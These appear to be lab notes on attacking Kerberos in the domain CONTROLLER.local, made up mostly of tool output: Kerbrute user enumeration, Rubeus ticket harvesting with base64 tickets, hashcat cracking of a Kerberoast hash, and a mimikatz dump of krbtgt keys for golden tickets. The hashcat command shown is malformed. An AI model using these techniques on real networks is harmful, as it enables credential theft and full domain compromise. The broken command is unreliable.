# Enum
```

└─# ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local kerb-wordlist.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/28/22 - Ronnie Flathers @ropnop

2022/03/28 13:23:47 >  Using KDC(s):
2022/03/28 13:23:47 >  	CONTROLLER.local:88

2022/03/28 13:23:47 >  [+] VALID USERNAME:	 administrator@CONTROLLER.local
2022/03/28 13:23:47 >  [+] VALID USERNAME:	 admin1@CONTROLLER.local
2022/03/28 13:23:47 >  [+] VALID USERNAME:	 admin2@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 httpservice@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 sqlservice@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 machine1@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 user1@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 machine2@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 user2@CONTROLLER.local
2022/03/28 13:23:48 >  [+] VALID USERNAME:	 user3@CONTROLLER.local
2022/03/28 13:23:48 >  Done! Tested 100 usernames (10 valid) in 1.545 seconds

```

# Rubeus

```
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe harvest /interval:30

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Harvesting (with auto-renewal) 
[*] Monitoring every 30 seconds for new TGTs 
[*] Displaying the working TGT cache every 30 seconds


[*] Refreshing TGT ticket cache (3/28/2022 10:32:26 AM)

  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL 
  StartTime             :  3/28/2022 10:06:03 AM
  EndTime               :  3/28/2022 8:06:03 PM
  RenewTill             :  4/4/2022 10:06:03 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable 
  Base64EncodedTicket   :

    doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
    cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEj9hpCFhDn9HS6jQBnxYIqapD64ABddz5DGR
    LWDwlrT0orWv4QYGROw9QAslz6Fv0r3JZOH4Gcjmk942BD2gRzyLHQgHM7upLw1WV8a9bS3FjvVx8Vdl8vrcOKSu0ogcMUhXSZ6I
    1I99TBtVLEp7we2yojD2Tp6zXciwCzAotyhJLjoSaN/R+oNVJ+m1NZ4cBh8wmHV0XV7naegGkXI9ILuII/F+pwo3KXd7P8rCFJim
    oJSx5xXAx3eRN6JYPJpPRvV/X7sipG4UG7L23DvX9qX4RmqOiogxjREXVnCdUAaDl66FBSfsAdfdIg2563mgzfVTnT+Jo1SEX351
    j9llnkGztvRpglW4qNinN//gV4T+98s6iDv8yGReNVfETR1HoeviPDgu2E1sfPGVaNopLicjB2i6vFd1js2jOvNJLPhj+hTxcKoQ
    1VtU2Gf3xi17al8qs1CzuAxeXQVz80fquWgYYb139y8UNAfGB/gfF5cFp3eQpiKPMU11YBjTwlyD4RAJFwN/qG5nzuagPyrHTpgQ
    cGAAeiZQzZzZoZBEdfzYSvVGeYEF9H0FDwnFiUBoUWi4hpx19DiDnkjxSj0JAS85xiEbTDKPs/atBrEA7Urde2JfKyJ/VMpZhr7S
    skWrZOvD6qp7ISq/cPn5IvidGEyRWO4Mr239NZB2j2OtvNgTlAryh8IhsbwMrOiQkA8l0fgbJ9MmJLzwXSYLZ+cAnS3+Puo5UnlB
    yfdPuNkCP3heKNiZbeumo4wE76Ze7f9mUP0OFhuRa4zgHoZiz6ImvRQu6pSsehs7kd6C6isF8TkzZtNN/+Nw2pi+pi56DQrS1VBN
    KHX4DeNcGrzgMOJsAc3XMFAwfZ3lUcfGfwZym4iUDuDyt/C750MmPDk7y2ylREn6cLVS+fN8Vu17rBuZW7osX2Ty9PuZV3fmYenr
    U4bHVI+uBnkBHs9i7+TBSvK/V6UahAd+/VkT+/ruC4QPzmiemFnN8q13ds4F6wER5bnzrbYw6hWJBdMK9+quVDyqAL3DfVvUfJyK
    uuTs96vtSP1OW6JOKnkS1ZziCBZIT4yjQstkF5/KEtr/nuWUmhb5JwCh6u8QDBdnpqwqUrUPSurc1ZpjX3J1kI0WsqNKygCRSd7O
    Fw58ps9bY1KwQQSFpFRQjaOI09gXsweXtK7kP4T2EXv9BfwGw/u3Q1mQB2ajjsbfBHwMBFA/QVMP56igmHDdM9XqCFV11v8a4Ljn
    PJcrg10W4ZOnACX//1XfCcNBYlo83leWLmEGIHFDu6nBKNWVISKzL6oTyP6fRF5Peiz9x6a3M1ybY9Je1Q0v5182JzjvgLtSda3l
    tdTKheUq661CN0nhtLBU22l7oIB1rZeJCQ0LjaMiWETVFIVrmRFDAHujgfcwgfSgAwIBAKKB7ASB6X2B5jCB46CB4DCB3TCB2qAr
    MCmgAwIBEqEiBCAD7yyL2WUmq6IEBM9bZtozHR9PIVr1j8Ee1d6Fj2ED6aESGxBDT05UUk9MTEVSLkxPQ0FMohowGKADAgEBoREw
    DxsNQ09OVFJPTExFUi0xJKMHAwUAQOEAAKURGA8yMDIyMDMyODE3MDYwM1qmERgPMjAyMjAzMjkwMzA2MDNapxEYDzIwMjIwNDA0
    MTcwNjAzWqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM

  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL
  StartTime             :  3/28/2022 10:06:03 AM
  EndTime               :  3/28/2022 8:06:03 PM
  RenewTill             :  4/4/2022 10:06:03 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
    cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEn5dA28LJGE9KjYJy/WPK5PrTKvd5/IkPNiM
    025NA8/RTn7JjJzwUQJSPc8/VNxpFf8gwIHIvCBfu3ogX64qS7V7aqNR0VoSi5Vk+eVgOJ8+vLUjd+D8wOiRqcE9ROojXkw2atW3
    kqv7AN7C7zyIQKFf3NRKM8nqmYNySIvkUdOtv3N4ATCCA7JsZu8ZLIWcon8iiqZXDmrS9DQq8wU4+4maxaioHxHXk7M1MnqalzTq
    PGQde74k5yyzdy2KhdJn/hTWeG+do9xobEKbABukC8nadYxYHQ/fe3EouBFczjsU7TDXiMEW/p/N/RkuEgCj/M6hpPobv1MsAW7w
    Rt5NZXYp28lWR8+gcIy7i9bmLs70lZQK/S2VJZ8cVgqYPQr79X/7qGrPhqMQu1boKNAULhU9Hbd+gxDcYN09d0CyvUvJExPG5eWj
    vZBBgF3tT3GttnNRBKE468y/HYYp7lJYjgfXEh7OI4lpf7YctXYBBGJQnWVMdfww7d5AGBpxGBuF0cz5azPEYaCMfoVy1wSXE6iR
    yJKs1ww2GaOCbBzN+KJr0babroxPm0Fbzdl+a7rkBbBejH7Ja1b/A9s6FgZ1Y/XHyejJ/Emy5qpJL1WApz2nDUjUymAM0P/n8lri
    c61DeesQO0ePmjpGOvegPq5EWrPpeOS4nrklSMlSYzqEcj67+Czk6/XMYg9bZGHiIkfTmSzZhAoHutxFpVeM9dy0lQ86mtskp1C0
    SLU0BobbIF/i8sdv+S3OV7BuAAEvHhV+iHju4FnadfHM/4Jzq58PxFts8ptwpddpe2bgsr4K/hBXdtnBrVkmUcPYyuNugDlQ5aNX
    lbxINH2pGo8i/aap/Icw1GjTNcsux0/Drmedkk5DouRP2SIbOZ5x0vXgvr3X9r2u3ajPRk2uOZQgDtE5wzZEF0rCj6eLMR2OxTmb
    gydOjCIMG4wSeMztuZtNtQJ8aLPr65NCJuAx8la4szO5lxILtLLXX7lMJjpVQBsiUuU4pHUp+hB2Ay6T5NdV6suES9IdaAjLIdgM
    YAyuYeKmAnI3FRBdi0zHP/4oYC30fIcKwaQtf1BRmfmNQqID2xz3tXJ9xTV/W9XJ3ujGZG4OWXHOFvOYDgtmfU97z+ExEzn89xHo
    JGG3UHcahC1t7HQnnsJeHCp1GEQjWzEaes6683Q/2MbAk2VJpF7ejA/HspMbX3qrZvnJ1EAWCEEHVLcBPeOnozLfg4Cf74JwhvBu
    1euFVypWQu3atmjDTBYHErt6NlLu+CK2dZ+PzrsYZGN41CQaSUyG3OZi23pNimAJnvuWz2nip8wc/XKG8yFpUXfRC1bBrYAX4+1q
    Za4kGTyG1igPsUWi7Gb7yW7xaSkl7+qXJ5rQlbNmkVhCBqnBMg2sBxajgfcwgfSgAwIBAKKB7ASB6X2B5jCB46CB4DCB3TCB2qAr
    MCmgAwIBEqEiBCApNRNPgbrGE5W4BJVJcw8oe+J/snKS0iCLIMH3aBY5oqESGxBDT05UUk9MTEVSLkxPQ0FMohowGKADAgEBoREw
    DxsNQ09OVFJPTExFUi0xJKMHAwUAYKEAAKURGA8yMDIyMDMyODE3MDYwM1qmERgPMjAyMjAzMjkwMzA2MDNapxEYDzIwMjIwNDA0
    MTcwNjAzWqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM

  User                  :  Administrator@CONTROLLER.LOCAL
  StartTime             :  3/28/2022 10:29:04 AM
  EndTime               :  3/28/2022 8:29:04 PM
  RenewTill             :  4/4/2022 10:29:04 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

    doIFjDCCBYigAwIBBaEDAgEWooIEgDCCBHxhggR4MIIEdKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
    cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQwMIIELKADAgESoQMCAQKiggQeBIIEGu4uDV6qyqrqryfZreH+wc+v6REaSMhPYeNA
    BaxBFE4M77sk/9iMBJG5u+zUTQM8ZMThy+NyVes/ceAYnmkKPEua8dDfF9JfNMNEskbGlMut8oWAEanu2r5VmwwWWegeSa1QMVRs
    hSINHvzg5TXTeuIwM5rBYDqE6iPo2/Gv3EPdnlFt1l3sTiRwyGhViHgsXdd1qRzLVKsqYZgWsyX9wbS2lqfoY7xxtBjlTs2euzBk
    AIGpBG5Z2suMMfgGgEJd4bAI7mBNaiF56vuwjPWVZYpPIvnc8DcXr1ubYiMciDRL7yELe7qvN+DhhhuvCVsZEI3x5NeoSLqqjeeV
    lXYQEldzBsw2v240Bz2V7C22zsJ1G5Rripmz8GfwsBG8QWwKE7Gqp7Fd1RKlbII4RkkAkL60d+hbpRQde4oGNkeEKEE4NmoP1xfB
    FTuOmxbnV6txeu1vwWZrQcpOpl1OVdPU+g2PtctyV40OSZwUijpZhlByNWHKUavZrXQGuC7TUhxO8Dl5T90rJsa7A6M8zY7WTHzn
    amFCcDSrSJ4ekOH5BmSFpanVQaP0vOiq/hBgDTPk1A4/pJc9xHsFJxBMDyltifH8i3etZJfPbMuH4F7uM8E/p+Sgvyaa3zuWIHvO
    1hchVCXfbTAiVcP1ZRdSsuZ9dupF2IBs/DnCJSNyX+9RjpBMARjNoaGgLR9sbJfvBEYjDYsAmS3MmMgSMOMeyuJEKTCHQ3EWwlFq
    j4MLzSQ5C+l+k+JGHWvtRYhOcvuJsRqEz7z3ZGZctfXyFDEM2ZnvJXC/vHKQt4BcVpkHbkDMI1TbE3OcXbhOmcGV48END8+SRMxv
    6PEUeinnUzdV9/Np3R5/10dVeNR/1GiejxkTwZ1N8y5Qnhhkp10+SrQoeiYugrlLrD4m78D9JNYklk8X72I51kZIg1XuNPA0z5Hi
    SuQBGscvtSak/QMSFQZDwuqzmIbOm5SvmLrqt7DbPf1PVf7mGp0HTRy4wEKNl0dJFd9lhjU1mdDdueWtdE/hbvMDoCtbjjMyu0if
    8U722EjYvfArRPD1hZFt0hLufQsUcrPKSEDCZwsNxwdUMjijlekjDVll9siWsy/1CcgVgcAeKjBSMurooNAJIbcNz8Xk/jWD0pEP
    3oOm5wzaNKlOplVlsj3qgazlLDQx+5ah6HSrp9M3993/mE+v/ghgWpx7Kk8ef6YS5wqPLnm/qN9to7AMI1IKyyidFeDo+RY6nK5P
    bil5K6YNl7rbLoIFcLlTfeanIQ4uxiCjr6dzRU1gDYYGTco8EulM9wpCcvnRdhFO2KXSfC2FR6clEWgFGwwZpEi2cWxuam5cm4IQ
    IIyiDOx3ZmEYdhV1WFO0K0PEdPxKsrZcBz080KIkpYVJGW1TSFvWZzN+BfgMpimoCKOB9zCB9KADAgEAooHsBIHpfYHmMIHjoIHg
    MIHdMIHaoCswKaADAgESoSIEIOl+HY1oanQbi9j3ErATqnTN+IzumnbqQzzLunRRUIOGoRIbEENPTlRST0xMRVIuTE9DQUyiGjAY
    oAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBA4QAApREYDzIwMjIwMzI4MTcyOTA0WqYRGA8yMDIyMDMyOTAzMjkwNFqnERgP
    MjAyMjA0MDQxNzI5MDRaqBIbEENPTlRST0xMRVIuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPTlRST0xMRVIuTE9DQUw=

[*] Ticket cache size: 3
[*] Sleeping until 3/28/2022 10:32:56 AM (30 seconds) for next display


```

# Cracking password with Rebeus

`hashcat -m 13100 -a hash.txt Password.txt -O` 

**NOTE**
- Make sure your hash file is free of white spaces and new lines. If you're using sublime to edit, replace " " and "\n" with ""
- if your VM has limited processing powers, use `-O` in the hashcat cmd to optimize run time

## Cracked hash 
```
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER...24a5b4
Time.Started.....: Mon Mar 28 14:05:12 2022 (0 secs)
Time.Estimated...: Mon Mar 28 14:05:12 2022 (0 secs)
Guess.Base.......: File (rockyou-mod.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    22756 H/s (0.29ms) @ Accel:128 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1240/1240 (100.00%)
Rejected.........: 0/1240 (0.00%)
Restore.Point....: 0/1240 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> hello123

Started: Mon Mar 28 14:04:52 2022


```


# Create golden tickets

```
mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 

RID  : 000001f6 (502) 
User : krbtgt

 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6

 * WDigest
    01  d2e9aa3caa4509c3f11521c70539e4ad
    02  c9a868fc195308b03d72daa4a5a4ee47
    03  171e066e448391c934d0681986f09ff4 
    04  d2e9aa3caa4509c3f11521c70539e4ad
    05  c9a868fc195308b03d72daa4a5a4ee47
    06  41903264777c4392345816b7ecbf0885
    07  d2e9aa3caa4509c3f11521c70539e4ad
    08  9a01474aa116953e6db452bb5cd7dc49
    09  a8e9a6a41c9a6bf658094206b51a4ead
    10  8720ff9de506f647ad30f6967b8fe61e
    11  841061e45fdc428e3f10f69ec46a9c6d
    12  a8e9a6a41c9a6bf658094206b51a4ead
    13  89d0db1c4f5d63ef4bacca5369f79a55
    14  841061e45fdc428e3f10f69ec46a9c6d 
    15  a02ffdef87fc2a3969554c3f5465042a
    16  4ce3ef8eb619a101919eee6cc0f22060
    17  a7c3387ac2f0d6c6a37ee34aecf8e47e
    18  085f371533fc3860fdbf0c44148ae730
    19  265525114c2c3581340ddb00e018683b
    20  f5708f35889eee51a5fa0fb4ef337a9b
    21  bffaf3c4eba18fd4c845965b64fca8e2
    22  bffaf3c4eba18fd4c845965b64fca8e2
    23  3c10f0ae74f162c4b81bf2a463a344aa
    24  96141c5119871bfb2a29c7ea7f0facef
    25  f9e06fa832311bd00a07323980819074 
    26  99d1dd6629056af22d1aea639398825b
    27  919f61b2c84eb1ff8d49ddc7871ab9e0
    28  d5c266414ac9496e0e66ddcac2cbcc3b
    29  aae5e850f950ef83a371abda478e05db

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 79bf07137a8a6b8f

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033 
      aes128_hmac       (4096) : 88cc87377b02a885b84fe7050f336d9b
      des_cbc_md5       (4096) : 79bf07137a8a6b8f

 * NTLM-Strong-NTOWF
    Random Value : 4b9102d709aada4d56a27b6c3cd14223

```